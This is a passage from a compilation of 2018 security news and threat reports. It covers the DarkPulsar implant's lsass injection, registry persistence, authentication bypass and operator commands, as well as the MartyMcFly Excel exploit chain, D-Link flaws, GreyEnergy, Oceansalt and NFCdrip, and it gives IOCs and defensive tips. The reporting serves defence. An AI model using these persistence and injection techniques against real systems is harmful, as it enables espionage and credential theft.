A function with a name related to SSPI (Security Support Provider Interface) operations. It implements the main malicious payload.
The implementations of the SSPI and TSPI interfaces are minimalistic: the functions that are exported by DarkPulsar have the same names as the interface functions; however, they include malicious code instead of the phone service.

The implant is installed in the system by the nameless exported function. The backdoor is launched by calling Secur32.AddSecurityPackage with administrator privileges with the path to its own library in the parameter, causing lsass.exe to load DarkPulsar as SSP/AP and to call its exported function SpLsaModeInitialize used by DarkPulsar to initialize the backdoor. In this way AddSecurityPackage is used to inject code into lsass.exe. It also adds its library name at HKLM\Software\Microsoft\Windows\CurrentVersion\Telephony\Providers

This is loaded at start by the Telephony API (TapiSrv) launched alongside the Remote Access Connection Manager (RasMan) service, setting startup type as “Automatic”. When loading the telephony service provider’s library, TapiSrv calls TSPI_lineNegotiateTSPIVersion which contains the AddSecurityPackage call to make the inject into lsass.exe.

DarkPulsar implements its payload by installing hooks for the SpAcceptLsaModeContext – function responsible for authentication. Such injects are made in several system authentication packets within the process lsass.exe and allow Darkpulsar to control authentication process based on the following protocols:

Msv1_0.dll – for the NTLM protocol,
Kerberos.dll – for the Kerberos protocol,
Schannel.dll – for the TLS/SSL protocols,
Wdigest.dll – for the Digest protocol, and
Lsasrv.dll –for the Negotiate protocol.
After this, Darkpulsar gets ability to embed malware traffic into system protocols. Since this network activity takes place according to standard system charts, it will only be reflected in the System process – it uses the system ports reserved for the above protocols without hindering their normal operation.

Network traffic during successful connection to DarkPulsar implant

The second advantage of controlling authentication processes is ability to bypass entering a valid username and password for obtaining access to objects that require authentication such as processes list, remote registry, file system through SMB. After Darkpulsar’s DisableSecurity command is sent, backdoor’s hooks on the victim side will always returns in the SpAcceptLsaModeContext function that passed credentials are valid. Getting that, system will provide access to protected objects to client.

Working with DarkPulsar
Darkpulsar-1.1.0.exe is the administrative interface working under the principle of “one command – one launch”. The command to be executed must be specified either in the configuration file Darkpulsar-1.1.0.9.xml or as command line arguments, detailing at least:

whether the target machine uses a 32-bit or 64-bit system;
protocol (SMB, NBT, SSL, RDP protocols are supported) to deliver the command and port number
private RSA key to decrypt the session AES key
Darkpulsar-1.1.0 was not designed as a standalone program for managing infected machines. This utility is a plugin of the Fuzzbunch framework that can manage parameters and coordinate different components. Here is how DisableSecurity command in Fuzzbunch looks like:

Below is an example of Processlist after DisableSecurity, allowing to execute any plugin without valid credentials and operating via regular system functions (remote registry service):

DanderSpritz
DanderSpritz is the framework for controlling infected machines, different from FuZZbuNch as the latter provides a limited toolkit for the post-exploitation stage with specific functions such as DisableSecurity and EnableSecurity for DarkPulsar.

For DanderSpritz works for a larger range of backdoors, using PeedleCheap in the victim to enable operators launching plugins. PeddleCheap is a plugin of DanderSpritz which can be used to configure implants and connect to infected machines. Once a connection is established all DanderSpritz post-exploitation features become available.

This is how DarkPulsar in EDFStagedUpload mode provides the opportunity to infect the victim with a more functional implant: PCDllLauncher (Fuzzbunch’s plugin) deploys the PeddleCheap implant on the victim side, and DanderSpritz provides a user-friendly post-exploitation interface. Hence, the full name of PCDllLauncher is ‘PeddleCheap DLL Launcher’.

The complete DanderSpritz usage scheme with the plugin PeddleCheap via FuZZbuNch with the plugins DarkPulsar and PCDllLauncher consists of four steps:

Via FuZZbuNch, run command EDFStagedUpload to launch DarkPulsar.
In DanderSpritz, run command pc_prep (PeedelCheap Preparation) to prepare the payload and the library to be launched on the implant side.
In DanderSpritz, run command pc_old (which is the alias of command pc_listen -reuse -nolisten -key Default) – this sets it to wait for a socket from Pcdlllauncher.
Launch Pcdlllauncher via FuZZbuNch and specify the path to the payload that has been prepared with the command pc_prep in the ImplantFilename parameter.

DanderSpritz

File System plugin

Conclusions
The FuzzBunch and DanderSpritz frameworks are designed to be flexible and to extend functionality and compatibility with other tools. Each of them consists of a set of plugins designed for different tasks: while FuzzBunch plugins are responsible for reconnaissance and attacking a victim, plugins in the DanderSpritz framework are developed for managing already infected victims.

The discovery of the DarkPulsar backdoor helped in understanding its role as a bridge between the two leaked frameworks, and how they are part of the same attacking platform designed for long-term compromise, based on DarkPulsar’s advanced abilities for persistence and stealthiness. The implementation of these capabilities, such as encapsulating its traffic into legitimate protocols and bypassing entering credentials to pass authentication, are highly professional.

Our product can completely remove the related to this attack malware.

Detecting malicious network activity
When EDFStagedUpload is executed in an infected machine, a permanent connection is established, which is why traffic via port 445 appears. A pair of bound sockets also appears in lsass.exe:

When DanderSpritz deploys PeddleCheap’s payload via the PcDllLauncher plugin, network activity increases dramatically:

When a connection to the infected machine is terminated, network activity ceases, and only traces of the two bound sockets in lsass.exe remain:

IOCs
implant – 96f10cfa6ba24c9ecd08aa6d37993fe4
File path – %SystemRoot%\System32\sipauth32.tsp
Registry – HKLM\Software\Microsoft\Windows\CurrentVersion\Telephony\Providers


DarkPulsar FAQ
20.10.2018 Kaspersky 
APT
What’s it all about?
In March 2017, a group of hackers calling themselves “the Shadow Brokers” published a chunk of stolen data that included two frameworks: DanderSpritz and FuzzBunch. The Fuzzbunch framework contains various types of plugins designed to analyze victims, exploit vulnerabilities, schedule tasks, etc. The DanderSpritz framework is designed to examine already controlled machines and gather intelligence. In pair, it is a very powerful platform for cyber-espionage.

How was this implant discovered?
We always analyze all leaks containing malicious software to provide the best detection. The same happened after the “Lost in Translation” leak was revealed. We noticed that this leak contained a tool in the “implants” category called DarkPulsar. We analyzed this tool and understood that it is not a backdoor itself, but the administrative part only. We also noticed some magic constants in this administrative module, and having created some special signatures based on them, were able to catch the implant itself.

What exactly can this implant be used for?
This implant supports 7 commands:

The most interesting are DisableSecurity and EnableSecurity.

Burn – for self-deletion.
RawShellcode – to execute arbitrary base-independent code.
EDFStageUpload – Exploit Development Framework Stage Upload. Step by step it deploys DanderSpritz payloads to the victim’s memory without touching the drive. After this command is executed, the administrator can send to the victim any of the multiple DanderSpritz commands. (View details in the technical part of this report)
DisableSecurity – for disabling NTLM protocol security. With help of this command, the malware administrator does not need to know a valid victim username and password to successfully pass authentication – the system will interpret any arbitrary pair as valid. (View details in the technical part of this report)
EnableSecurite – the opposite of DisableSecurity.
UpgradeImplant – for installing a new version of the backdoor.
PingPong – for test communication.
How many victims?
We found around 50 victims, but believe that the figure was much higher when the Fuzzbunch and DanderSpritz frameworks were actively used. We think so because of the DanderSpritz interface, which allows many victims to be managed at the same time. The second point proving this suggestion is that after stopping their cyber-espionage campaign, the malware owners often delete their malware from victim computers, so the 50 victims are very probably just ones that the attackers have simply forgotten.

Which countries?
All victims were located in Russia, Iran, and Egypt, and typically Windows 2003/2008 Server was infected. Targets were related to nuclear energy, telecommunications, IT, aerospace, and R&D

What about the attack duration? Does it last long?
DarkPulsar’s creators did not skimp on resources in developing such an advanced mechanism of persistence. They also included functionality to disable NTLM protocol security for bypassing the need to enter a valid username and password during authentication. This indicates that victims infected with DarkPulsar were the targets of a long-term espionage attack.

Is the attack still active?
We think that after the “Lost In Translation” leakage the espionage campaign was stopped, but that doesn’t mean that all computers are rid of this backdoor infection. We cured all our users. As for users without our protection, we have several tips on how to check whether your system is infected and how to cure it by yourself. Note that to exploit this backdoor on infected victims, the attackers need to know the private RSA key which pairs to the public key embedded in the backdoor. It means that no one except real DarkPulsar’s managers can exploit compromised systems.

How to protect against this threat?
We can detect this threat with different technologies.

However, the standard recommendations remain the same:

Keep your security products up to date
Do not turn security product components off
Keep your OS updated
Install all security patches asap
Use special traffic analysis tools and pay attention to all encrypted traffic
Do not use weak passwords or the same password for several endpoints
Use complex passwords
Do not allow remote connections to endpoints with administration rights
Do not allow domain administrators to be local administrators with the same credentials
Which proactive technologies do you have to protect users against such threats?
We use machine learning, cloud technologies, emulation, and behavioral analysis in combination with anti-exploit protection to provide the best proactive protection for our clients.

Who is behind this threat?
We never engage in attribution. Our purpose is to counteract all threats, regardless of their source or destination.

How was this implant used? Was it created for stealing money or just information?
We have not seen any techniques for stealing money in this implant, but it is worth keeping in mind that this implant can run any executable code, so its functionality can be increased significantly.


Splunk addressed several vulnerabilities in Enterprise and Light products
20.10.2018 securityweek
Vulnerebility

Splunk recently addressed several vulnerabilities in Enterprise and Light products, some of them have been rated “high severity.”
Splunk Enterprise solution allows organizations to aggregate, search, analyze, and visualize data from various sources that are critical to business operations.

The Splunk Light is a comprehensive solution for small IT environments that automates log analysis and integrate server and network monitoring.

“To mitigate these issues, Splunk recommends upgrading to the latest release and applying as many of the Hardening Standards from the Securing Splunk documentation as are relevant to your environment. Splunk Enterprise and Splunk Light releases are cumulative, meaning that future releases will contain fixes to these vulnerabilities, new features and other bug fixes,” reads the advisory published by Splunk.

The most severe issue fixed by the company is a high severity cross-site scripting (XSS) flaw in the Web interface, tracked as CVE-2018-7427, that received the CVSS score of 8.1.

Another severe vulnerability is a DoS flaw tracked as CVE-2018-7432 that could be exploited using malicious HTTP requests sent to Splunkd that is the system process that handles indexing, searching and forwarding. This issue was tracked as “medium severity” by the company.

The company also addressed a denial-of-service (DoS) vulnerability, tracked as CVE-2018-7429, that could be exploited by an attacker by sending a specially crafted HTTP request to Splunkd.

The last flaw addressed by the vendor, tracked as CVE-2018-7431, is a path traversal issue that allows an authenticated attacker to download arbitrary files from the vendor Django app. The vulnerability has been rated “medium severity.”

Below the affected versions:

Cross Site Scripting in Splunk Web (CVE-2018-7427)
Affected Product Versions: Splunk Enterprise versions 6.5.x before 6.5.3, 6.4.x before 6.4.7, 6.3.x before 6.3.10, 6.2.x before 6.2.14, 6.1.x before 6.1.13, 6.0.x before 6.0.14 and Splunk Light before 6.6.0
Affected Components: All Splunk Enterprise components running Splunk Web.
Denial of Service (CVE-2018-7432)
Affected Product Versions: Splunk Enterprise versions 6.5.x before 6.5.3, 6.4.x before 6.4.7, 6.3.x before 6.3.10, 6.2.x before 6.2.14 and Splunk Light before 6.6.0
Affected Components: All Splunk Enterprise components running Splunk Web.
Path Traversal Vulnerability in Splunk Django App (CVE-2018-7431)
Affected Product Versions: Splunk Enterprise versions 6.5.x before 6.5.3, 6.4.x before 6.4.6, 6.3.x before 6.3.10, 6.2.x before 6.2.14, 6.1.x before 6.1.13, 6.0.x before 6.0.14 and Splunk Light before 6.6.0
Affected Components: All Splunk Enterprise components running Splunk Web.
Splunkd Denial of Service via Malformed HTTP Request (CVE-2018-7429)
Affected Product Versions: Splunk Enterprise versions 6.4.x before 6.4.8, 6.3.x before 6.3.11, 6.2.x before 6.2.14 and Splunk Light before 6.5.0
Affected Components: All Splunk Enterprise components running Splunk Web.
The vendor declared it has found no evidence that these vulnerabilities have been exploited in attacks in the wild.


MartyMcFly Malware: new Cyber-Espionage Campaign targeting Italian Naval Industry
20.10.2018 securityweek
CyberSpy  Virus

Yoroi security firm uncovered a targeted attack against one of the most important companies in the Italian Naval Industry leveraging MartyMcFly Malware.
Today I’d like to share an interesting analysis of a Targeted Attack found and dissected by Yoroi (technical details are available here). The victim was one of the most important leaders in the field of security and defensive military grade Naval ecosystem in Italy. Everything started from a well-crafted email targeting the right office asking for naval engine spare parts prices. The mail was quite clear, written in a great language within detailed spare parts matching the real engine parts. The analyzed email presented two attachments to the victim:
A company profile, aiming to present the company who was asking for spare parts
A Microsoft.XLSX where (apparently) the list of the needed spare parts was available
The attacker asked for a quotation of the entire spare part list available on the spreadsheet. In such a way the victim needed to open-up the included Microsoft spreadsheet in order to enumerate the “fake customer” needs. Opening up The Excel File it gets infected.

Let’s go deep into that file and see what is happening there. At a first sight, the office document had an encrypted content available on OleObj.1 and OleObj.2. Those objects are real Encrypted Ole Objects where the Encrypted payload sits on “EncryptedPackage” section and information on how to decrypt it are available on “EncryptionInfo” xml descriptor. However, in that time, the EncryptionInfo was holding the encryption algorithm and additional information regarding the payload but no keys were provided. The question here was disruptive. How Microsoft Excel is able to decrypt such a content if no password is requested to the end user? In another way, if the victim opens the document and he/she is not aware of “secret key” how can he/she get infected? And why the attacker used an encrypted payload if the victim cannot open it?

Stage1: Encrypted Content
Using an encrypted payload is quite a common way to evade Antivirus, since the encrypted payload changes depending on the used key. But what is the key?
Well, on Microsoft Excel there is a common way to open documents called “Read Only”. In “Read Only” mode the file could be opened even if encrypted. Microsoft excel asks the user a decryption key only if the user wants to save, to print or to modify the content. In that case, Microsoft programmers used a special and static key to decrypt the “Read Only” documents. Such a key sees the following value: “VelvetSweatshop” (a nice old article on that). Let’s try to use this “key” to try to decrypt the content! The following image shows a brand new stage where a valid extracted xlsx file wraps more objects, we define it as Stage2.

Stage2: OleOBj inclusion (click to expand it)
A quick analysis of the Stage2 exposes a new object inclusion. (as shown in picture Stage2: OleOBJ inclusion). That object was crafted on 2018-10-09 but it was seen only on 2018-10-12. At this time the extracted object is clear text and not encrypted content was find at all. The following image shows the extracted object from Stage2.

Stage2: extracted Payload

It’s not hard to see what the payload does (CVE-2017-11882 ), but if you run it on a dynamic engine you would probably have more chances to prove it. The Payload exploits CVE-2017-11882 by spawning the Equation Editor, dropping and executing an external PE file. We might define the Equation Editor dropping and executing as the Stage3. The following image shows the connection to a dropping website performed by EquationEditor (click to magnify it).

Stage3: Equation Editor Spawned and connecting to Dropping URL
Evidence of what dissected is shown on the following image (Introducing Stage4) where the EquationEditor network trace is provided. We are introducing a new stage: the Stage4. GEqy87.exe(Stage4) is a common windows PE. It’s placed inside an unconventional folder (js/jquery/file/… ) into a compromised and thematic website. This placement usually has a double target: (a) old school or un-configured IDS bypassing (b) hiding malicious software an into well-known and trusted folder structure in order to persist over website upgrades.

Introducing Stage4. PE file dropped and executed
Stage4 is pretty interesting per-se. It’s a nice piece of software written in Borland Delphi 7. According to VirusTotal the software was “seen in the Wild” in 2010 but submitted only on 2018-10-12! This is pretty interesting, isn’t it? Maybe hash collision over multiple years? Maybe a buggy variable on VirusTotal? Or maybe not, something more sophisticated and complex is happening out there.

Stage4: According to Virus Total
Looking into GEqy87 is quite clear that the sample was hiding an additional windows PE. On one, hand it builds up the new PE directly on memory by running decryption loops (not reversed here). On the other, hand it fires up 0xEIP to pre-allocated memory section in order to reach new available code section.

Stage5: Windows PE hidden into GEqy87.exe
Stage5 deploys many evasion tricks such as GetLastInputIn, SleepX, and GetLocalTime to trick debuggers and SandBoxes. It makes an explicit date control check to 0x7E1 (2017). If the current date is less or equals to 0x7E1 it ends up by skipping the real behavior while if the current date is, for example, 2018, it runs its behavior by calling “0xEAX” (typical control flow redirection on memory crafted).
For more technical details, please have a look here. What it looks very interesting, at least in my personal point of view, are the following evidence:
Assuming there were no hash collisions over years
Assuming VirusTotal: “First Seen in The Wild” is right (and not bugged)
We might think that: “we are facing a new threat targeting (as today) Naval Industry planned in 2010 and run in 2018″.
The name MartyMcFly comes pretty naturally here since the “interesting date-back from Virus Total”. I am not confident about that date, but I can only assume VirusTotal is Right.

For IoC please visit the analysis from here.

Further details on the MartyMcFly malware are reported in the original analysis published by Marco Ramilli on his blog.

Yoroi also launched his a new blog where it is possible to find several interesting analysis, including the one on the MartyMcFly malware.


Chaining three critical vulnerabilities allows takeover of D-Link routers
20.10.2018 securityweek
Vulnerebility

Researchers from the Silesian University of Technology in Poland discovered several flaws that could be exploited to take over some D-Link routers.
A group of researchers from the Silesian University of Technology in Poland has discovered three vulnerabilities in some models of D-Link routers that could be chained to take full control over the devices.

The flaws are a Directory Traversal (CVE-2018-10822), Password stored in plaintext (CVE-2018-10824), and a Shell command injection (CVE-2018-10823).

“I have found multiple vulnerabilities in D-Link router httpd server. These vulnerabilities are present in multiple D-Link types of routers. All three taken together allow to take a full control over the router including code execution.” reads the security advisory.

The vulnerabilities reside in the httpd server of some D-Link routers, including DWR-116, DWR-111, DIR-140L, DIR-640L, DWR-512, DWR-712, DWR-912, and DWR-921.

Researchers found a directory traversal vulnerability, tracked as CVE-2018-10822, that could be exploited by remote attackers to read arbitrary files using an HTTP request.

The issue was initially reported to D-Link as CVE-2017-6190, but the vendor did not correctly fix the flaw.

This flaw could be exploited to gain access to a file that stores the admin password for the device in clear text.

The storage of password in clear text is tracked as CVE-2018-10824, to avoid abuses the experts did not reveal the path of the files

Researchers also reported another flaw, tracked as CVE-2018-10823, that could be exploited by an authenticated attacker to execute arbitrary commands and take over the device.

Below a video that shows how the flaws could be chained to takeover a device:

The experts reported the flaws to D-Link in May but the vendor still hasn’t addressed them, then the experts publicly disclosed the vulnerabilities.

Waiting for a patch to address the vulnerabilities, users can make their devices not accessible from the Internet.


The author of the LuminosityLink RAT sentenced to 30 Months in Prison
20.10.2018 securityweek
Virus

The author of the infamous LuminosityLink RAT, Colton Grubbs (21), was sentenced to 30 months in federal prison.
Colton Grubbs, 21, of Stanford, Kentucky, the author of the infamous LuminosityLink RAT, was sentenced to 30 months in federal prison,

In February, the Europol’s European Cybercrime Centre (EC3) along with the UK National Crime Agency (NCA) disclosed the details of an international law enforcement operation that targeted the criminal ecosystem around the Luminosity RAT (aka LuminosityLink).

According to the EC3, the joint operation was conducted in September 2017, it involved more than a dozen law enforcement agencies from Europe, the US, and Australia.

The Luminosity RAT was first spotted in 2015 but it became very popular in 2016.

The malware was offered for sale in the criminal underground for as little as $40, it allows attackers to take complete control over the infected system.

The Luminosity RAT was one of the malicious code used in Business Email Compromise attacks and was also used Nigerian gangs in attacks aimed at industrial firms.

Luminosity RAT

In September 2016, the UK law enforcement arrested Colton Grubbs, the man admitted to designing, marketing, and selling LuminosityLink.

Grubbs offered for sale the malware for $39.99 to more than 6,000 customers, he also helped them to hack computers worldwide.

“Grubbs previously admitted to designing, marketing, and selling a software, called
LuminosityLink, that Grubbs knew would be used by some customers to remotely access and control their victims’ computers without the victims’ knowledge or consent. Among other malicious features, LuminosityLink allowed Grubbs’ customers to record the keys that victims pressed on their keyboards, surveil victims using their computers’ cameras and microphones, view and download the computers’ files, and steal names and passwords used to access websites.” reads the DoJ’s sentence.
“Directly and indirectly, Grubbs offered assistance to his customers on how to use LuminosityLink for unauthorized computer intrusions through posts and group chats on websites such as HackForums.net. “

Grubbs will serve 85% of his prison sentence, then he will be released under supervision of the United States Probation Office for a term of three years.

Grubbs must forfeit the proceeds of his crimes, including 114 Bitcoin that was seized by the Federal Bureau of Investigation.

“Our modern society is dependent on computers, mobile devices, and the use of the internet. It is essential that we vigorously prosecute those who erode that confidence and illicitly gain access to computer systems and the electronic information of others. Everyone benefits when this deceitful conduct is discovered, investigated, and prosecuted,” Robert M. Duncan, Jr., United States Attorney for the Eastern District of Kentucky, said.

The arrest triggered a new investigation that resulted in several arrests, search warrants, and cease and desist notifications across Europe, America, and Australia.

Law enforcement agencies target both sellers and users of Luminosity Trojan. According to the NCA, a small crime ring in the UK distributed Luminosity RAT to more than 8,600 buyers across 78 countries.


Group-IB: 14 cyber attacks on crypto exchanges resulted in a loss of $882 million
20.10.2018 securityweek
Cryptocurrency

Group-IB has estimated that crypto exchanges suffered a total loss of $882 million due to targeted attacks between 2017 and 2018.
Group-IB, an international company that specializes in preventing cyber attacks,has estimated that cryptocurrency exchanges suffered a total loss of $882 million due to targeted attacks in 2017 and in the first three quarters of 2018. According to Group-IB experts, at least 14 crypto exchanges were hacked. Five attacks have been linked to North Korean hackers from Lazarus state-sponsored group, including the infamous attack on Japanese crypto exchange Coincheck, when $534million in crypto was stolen.

This data was included in the annual Hi-Tech Crime Trends 2018 report, presented by Group-IB CTO, Dmitry Volkov, at the sixth international CyberСrimeCon conference. A separate report chapter is dedicated to the analysis of hackers’ and fraudsters’ activity in crypto industry.

Crypto exchanges: in the footsteps of Lazarus

In most cases, cybercriminals, while attacking cryptocurrency exchanges, use traditional tools and methods, such as spear phishing, social engineering, distribution of malware, and website defacement. One successful attack could bring hackers tens of millions of dollars in crypto funds, whilst reducing the risks of being caught to a minimum: the anonymity of transactions allows cybercriminals to withdraw stolen funds without putting themselves at greater risk.

Spear phishing remains the major vector of attack on corporate networks. For instance, fraudsters deliver malware under the cover of CV spam: they send an email containing a fake CV with the subject line “Engineering Manager for Crypto Currency job” or the file «Investment Proposal.doc» in attachment, that has a malware embedded in the document.

In the last year and a half, the North-Korean state-sponsored Lazarus group attacked at least five cryptocurrency exchanges: Yapizon, Coins, YouBit, Bithumb, Coinckeck. After the local network is successfully compromised, the hackers browse the local network to find workstations and servers used working with private cryptocurrency wallets.

crypto exchanges

“Last year we warned that hackers competent enough to carry out a targeted attack might have a new target – cryptocurrency exchanges,” — reminded Dmitry Volkov, Group-IB CTO.

“In the last couple of years, crypto exchanges suffered many attacks. Some of the exchanges went bankrupt after the hacks, i.e. Bitcurex, YouBit, Bitgrail. At the beginning of 2018 hackers’ interest in cryptocurrency exchanges ramped up. The most likely cryptocurrency exchange attackers now are Silence, MoneyTaker, and Cobalt.”

ICO: more than 56% of funds were stolen through phishing attacks

Hackers cause serious damage to ICOs: they attack founders, community members, and platforms. In 2017 more than 10% of funds raised through ICOs were stolen, while 80% of projects disappeared with the money without fulfilling any obligations towards their investors.

Yet despite the pessimistic forecasts, the number of funds invested in ICOs increased significantly. In H1 of 2018 alone, ICO projects raised almost $14 billion, which is twice as much as during the entire 2017 ($5,5 billion) — according to CVA and PwC studies. Therefore, cybercriminals can steal more funds in one successful attack.

In 2018, hackers attacked ICOs conducting private funding rounds. For instance, cyber criminals targeted TON project, founded by Pavel Durov, through phishing and managed to steal $35,000 in Ethereum. The worst generally happens on the first day of token sales: a set of DDoS attacks simultaneous with an influx of users, the eruption of Telegram and Slack messages, mailing list spamming.

Phishing remains one of the major vectors of attacks on ICOs: approximately 56% of all funds stolen from ICOs were siphoned off as a result of phishing attacks. On the rise of “the crypto-fever” everyone is striving to purchase tokens, often sold at a significant discount, as fast as possible without paying attention to fine details such as fake domain names. One beg phishing group is capable of stealing roughly $1 million a month.

Phishing attacks against ICO projects are not always aimed at stealing money. This year, there were several cases of investor database theft. This information can be later re-sold on the darknet or used for blackmail.

A relatively new method of fraud on the ICO market was stealing a White Paper of an ICO project and presenting an identical idea under a new brand name. Fraudsters build a website to feature a new brand and a new team using the stolen project description and announce an ICO.


Attackers behind Operation Oceansalt reuse code from Chinese Comment Crew
20.10.2018 securityweek
APT

Security researchers from McAfee have recently uncovered a cyber espionage campaign, tracked as Operation Oceansalt, targeting South Korea, the United States, and Canada.
The threat actors behind Operation Oceansalt are reusing malware previously associated with China-linked cyberespionage group APT1.

“McAfee Advanced Threat Research and Anti-Malware Operations teams have discovered another unknown data reconnaissance implant targeting Korean-speaking users.” reads the report.

“We have named this threat Operation Oceansalt based on its similarity to the earlier malware Seasalt, which is related to earlier Chinese hacking operations. Oceansalt reuses a portion of code from the Seasalt implant (circa 2010) that is linked to the Chinese hacking group Comment Crew. Oceansalt appears to have been part of an operation targeting South Korea, United States, and Canada in a well-focused attack.”

APT1 cyberespionage group, aka Comment Crew, was first discovered in 2013 by experts from Mandiant firm. The evidence collected by the security experts links APT1 to China’s 2nd Bureau of the People’s Liberation Army (PLA) General Staff Department’s (GSD) 3rd Department (Military Cover Designator 61398), experts believe the group has been active since 2006 and targeted hundreds of organizations in multiple industries.

According to McAfee, Operation Oceansalt was not conducted by APT1, attackers leverage the Oceansalt implant that borrows the code from the APT1 tool dubbed Seasalt.

Both malware uses similar command handler and index table, and exactly the same response codes associated with command execution.

“Oceansalt contains the following strings that are part of Seasalt:

Upfileer
Upfileok
Both implants have a high degree of similarity in code sharing and functions. A few of their commonalities follow.”

According to the researchers, the implant is only a first-stage component that allows operators to perform various actions on the infected systems and to downloads additional components.

Oceansalt implements a dozen commands, including extract drive information, send information about a specific file, execute a command line using WinExec(), delete file, create file, get information on the running processes, terminate process, create/operate/terminate reverse shell, and test receive and send capabilities.

Operation Oceansalt

At the time of the analysis, it was still unclear who is behind the campaign, the only certainty was that the attackers in someway have access to the APT1’s source code even if it was never publicly disclosed.

The Oceansalt implant was used in at least five campaigns and was customized to the specific targets.

In the first two waves of attacks, threat actors used spear-fishing emails with weaponized Korean-language Microsoft Excel documents to download the implant. In the third campaign hackers leveraged on weaponized Microsoft Word documents, while the remaining waves of attacks targeted a small number of entities outside of South Korea, including the U.S. and Canada.

The attackers used several command and control (C&C) servers, their analysis revealed the Operation Oceansalt campaign is active in Canada, Costa Rica, the United States, and the Philippines.

“Perhaps more important is the possible return of a previously dormant threat actor and, further, why should this campaign occur now? Regardless of whether this is a false flag operation to suggest the rebirth of Comment Crew, the impact of the attack is unknown.” McAfee concludes.

“However, one thing is certain. Threat actors have a wealth of code available to leverage new campaigns, as previous researchfrom the Advanced Threat Research team has revealed. In this case we see that collaboration not within a group but potentially with another threat actor—offering up considerably more malicious assets. ”


NFCdrip Attack Proves Long-Range Data Exfiltration via NFC
19.10.2018 securityweek
Attack

Researchers have demonstrated that the near-field communication (NFC) protocol can be used to exfiltrate small amounts of data, such as passwords and encryption keys, over relatively long distances.

NFC enables two devices to communicate over distances of up to 10 cm (4 in). The system, present in most modern smartphones, is often used for making payments, sharing files, and authentication.

Pedro Umbelino, senior researcher at application security firm Checkmarx has demonstrated that NFC can actually work over much longer distances and it can be highly efficient for stealthily exfiltrating data from air-gapped devices that have other communication systems – such as Wi-Fi, Bluetooth and GSM – disabled.

The attack, dubbed NFCdrip, involves changing NFC operating modes to modulate data. In the case of Android, changing NFC operating modes does not require any special permissions, making the attack even easier to launch.NFCdrip

NFCdrip uses on-off keying (OOK), the simplest form of amplitude-shift keying (ASK) modulation, in which the presence of a carrier wave signals a “1” bit and the absence of a wave a “0” bit. The exfiltration of 8 bits is required to send out one character, but researchers typically also suggest the use of additional bits for error detection.

In his experiments, Umbelino showed how a piece of malware installed on an Android smartphone can be used to transmit a password over tens of meters to another Android phone that is connected to a simple AM radio.

The researcher showed that data can be transmitted over a distance of 2.5 m (8 ft) without any errors at a rate of 10-12 bits per second. The transfer rate is maintained on a distance of 10 m (32 ft), but some errors appear, although they are corrected. As the distance increases, the signal fades and the number of errors increases, but Umbelino did manage to transfer some data over a distance of more than 60 m (nearly 200 ft). He also managed to exfiltrate data through walls over a distance of 10 m.

The range can be extended significantly if an AM antenna and a software defined radio (SDR) dongle are used, the expert said.

Umbelino noted that the attack may even work on some devices when airplane mode is activated, and highlighted that this is not an Android-specific issue – NFCgrip attacks can be conducted on laptops and other types of devices as well.

Checkmarx plans on making the NFCgrip PoC application open source. In the meantime, several videos showing the experiments conducted by Umbelino and a Hack.lu talk discussing the findings have been made available.


'GreyEnergy' Cyberspies Target Ukraine, Poland
19.10.2018 securityweek 
APT CyberSpy  ICS

Over the past three years, ESET security researchers have been tracking a cyber-espionage group linked to the infamous BlackEnergy hackers.

BlackEnergy has been around since at least 2007, but rose to prominence in December 2015 when it caused a major blackout. The newly documented group, which ESET refers to as GreyEnergy, emerged around the same time.

Another group that emerged around the same time is TeleBots, which is said to have orchestrated the massive NotPetya outbreak last year. Recently, the security researchers managed to link the group to Industroyer, which is considered the most powerful modern malware targeting industrial control systems (ICS).

According to an ESET report published on Wednesday (PDF), the BlackEnergy threat actor evolved into two separate groups, namely TeleBots and GreyEnergy. The former is focused on launching cybersabotage attacks on Ukraine, through computer network attack (CNA) operations.

Over the past three years, GreyEnergy was observed being involved in attacks targeting entities in Ukraine and Poland, but mainly focused on cyber-espionage and reconnaissance. The group's operations have been aimed at energy sector, transportation, and other high-value targets.

The GreyEnergy malware features a modular architecture, meaning that its capabilities are dependent on the modules the operator chooses to deploy. These modules, however, include backdoor, file extraction, screenshot capturing, keylogging, password and credential stealing, and other functionality.

“We have not observed any modules that specifically target Industrial Control Systems software or devices. We have, however, observed that GreyEnergy operators have been strategically targeting ICS control workstations running SCADA software and servers,” Anton Cherepanov, a senior security researcher at ESET, reveals.

None of the malware’s modules, ESET says, is capable of affecting ICS, but its operators did use, on at least one occasion, a disk-wiping component to disrupt operating processes. One of the GreyEnergy samples was using a valid digital certificate likely stolen from Taiwanese company Advantech.

The actor is targeting organizations either through compromised self-hosted web services or via spear-phishing emails with malicious attachments.

The attackers would also deploy additional backdoors to the compromised web servers that are accessible from the Internet. The hackers favor PHP backdoors and use several layers of obfuscation and encryption to hide the malicious code.

The attachments of spear-phishing emails would first drop a lightweight first-stage backdoor dubbed GreyEnergy mini (and also known as FELIXROOT) to map the network and collect admin credentials using tools such as Nmap and Mimikatz.

The collected credentials are then used to deploy the main GreyEnergy malware, which requires administrator privileges. The backdoor is deployed on servers with high uptime and workstations used to control ICS environments. Additional software (proxies deployed on internal servers) is used to communicate with the command and control (C&C) server as stealthily as possible.

Written in C and compiled using Visual Studio, the GreyEnergy malware is usually deployed in two modes: in-memory-only mode, when no persistence is required, and using Service DLL persistence, to survive system reboots. The functionality of the malware is the same in both cases.

The GreyEnergy modules researchers have observed to date are meant to inject a PE binary into a remote process; collect information about the system and event logs; perform file system operations; grab screenshots; harvest key strokes; collect saved passwords from various applications; use Mimikatz to steal Windows credentials; use Plink to create SSH tunnels; and use 3proxy to create proxies.

The malware leverages Tor relay software when active, with the C&C infrastructure setup similar to that of BlackEnergy, TeleBots, and Industroyer. Furthermore, GreyEnergy and BlackEnergy have a similar design and a similar set of modules and features, although they are implemented differently.

Furthermore, ESET researchers discovered a worm that appears to be the predecessor of NotPetya, and which they call Moonraker Petya. The malware, which contains code that makes the computer unbootable, was deployed against a small number of organizations and has limited spreading capabilities.

Moonraker Petya shows a cooperation between TeleBots and GreyEnergy, or at least reveals they are sharing some ideas and code. The main difference between the two is that TeleBots focuses solely on Ukraine, while GreyEnergy operates outside the country’s borders as well.

“GreyEnergy is an important part of the arsenal of one of the most dangerous APT groups that has been terrorizing Ukraine for the past several years. We consider it to be the successor of the BlackEnergy toolkit. The main reasons for this conclusion are the similar malware design, specific choice of targeted victims, and modus operandi,” ESET concludes.


LuminosityLink RAT Author Sentenced to 30 Months in Prison
19.10.2018 securityweek
CyberCrime

The maker of the LuminosityLink remote access Trojan (RAT) was sentenced to 30 months in federal prison, the United States Department of Justice announced this week.

